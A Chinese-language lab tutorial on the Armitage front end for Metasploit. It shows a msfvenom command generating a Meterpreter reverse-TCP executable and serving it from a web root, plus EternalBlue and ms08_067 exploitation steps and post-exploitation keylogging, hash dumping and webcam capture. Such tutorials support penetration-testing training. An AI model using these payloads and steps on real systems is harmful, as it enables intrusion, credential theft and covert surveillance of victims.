Armitage 是 Metasploit 的图形化前端工具,极大降低了渗透测试的门槛,尤其适合初学者和教学演示。本文将带你快速上手 Armitage 的安装、配置、漏洞利用及后渗透操作全过程。
一、什么是 Armitage?
Armitage 是一款为 Metasploit 提供图形界面的工具,主要功能包括:
- 主机扫描与发现
- 漏洞模块调用与利用
- Meterpreter 会话管理
- 多主机协同攻击支持
通过图形化界面,你可以拖拽目标,点击按钮,完成命令行中繁琐的操作,特别适合教学和入门渗透测试者。
二、Armitage 的启动方式
在 Kali Linux 中,启动 Armitage 前需要初始化 PostgreSQL 数据库:
service postgresql start
msfdb init
启动 Armitage 有两种方法:
- 菜单启动:Applications → Kali Linux → Exploitation Tools → Armitage
- 命令行启动:输入
armitage
三、生成攻击载荷与控制端
Armitage 支持通过图形界面生成被控端(payload)和监听端(multi/handler):
1. 生成被控端
选择 Payload 输出为 EXE,即可生成可执行文件,相当于命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=端口 -f exe > shell.exe
将生成的 shell.exe
文件放置到 Web 根目录下:
cp shell.exe /var/www/html/
service apache2 start
靶机访问该文件并执行后,监听端即可接收到连接,建立 Meterpreter 会话。
四、网络扫描:识别目标主机
在 Armitage 中可调用 Nmap 进行图形化扫描:
步骤:
-
菜单选择:
Hosts → Nmap Scan → Quick Scan(OS detect)
-
输入网段:如
192.168.128.0/24
-
查看结果:发现在线主机、开放端口和操作系统信息
这相当于执行以下命令行:
nmap --min-hostgroup 96 -sV -n -T4 -O -F --version-light 192.168.128.0/24
五、漏洞利用实战
案例 1:利用 ms08_067
攻击 Windows XP
目标:IP 192.168.128.131
-
在模块搜索框中输入
ms08_067
-
双击模块,输入目标 IP,勾选 “Use a reverse connection”
-
点击 Launch 发动攻击
-
若成功,控制台会显示新会话(Session)
注意: 本攻击模块使用端口 445,若 apache2 占用需先关闭:
service apache2 stop
案例 2:利用 ms17_010
攻击 Windows 7
目标:IP 192.168.128.130
(永恒之蓝靶机)
操作同上,选择模块 ms17_010_eternalblue
,填写 IP 并执行攻击。
若成功,Armitage 界面中目标主机图标会变色,提示已建立 Meterpreter 会话。
六、后渗透阶段操作
通过 Meterpreter,Armitage 提供丰富的后渗透工具:
1. Access(访问控制)
- Dump Hashes:获取系统哈希值(模拟密码抓取)
2. Interact(交互)
- 打开远程命令行窗口,执行系统命令
3. Explore(系统探索)
- Browse Files:浏览目标文件系统
- Screenshot:截图目标桌面
- Log Keystrokes:记录键盘输入
- Webcam Snap:拍摄摄像头图像
4. Pivoting(横向移动)
- 将当前主机作为跳板,攻击内网其他主机
5. ARP Scan
- 利用目标主机对其所在子网进行扫描,发现更多资产
七、案例演示:键盘记录
-
通过
Explore → Log Keystrokes
启动键盘监听器
-
在靶机打开记事本并输入内容
-
控制端窗口实时显示用户输入的内容(如密码、账号等)
八、总结
Armitage 以图形化方式呈现了 Metasploit 的强大功能,降低了学习曲线,适合初学者掌握渗透测试基本流程。通过本篇实战,我们完成了:
- 环境配置
- payload 生成与部署
- 网络扫描
- 漏洞利用
- 后渗透操作
未来可尝试结合 Cobalt Strike 等高级框架进行实战演练,迈向更高阶的红队实战之路。
如果你觉得这篇文章对你有帮助,欢迎点赞、评论、收藏!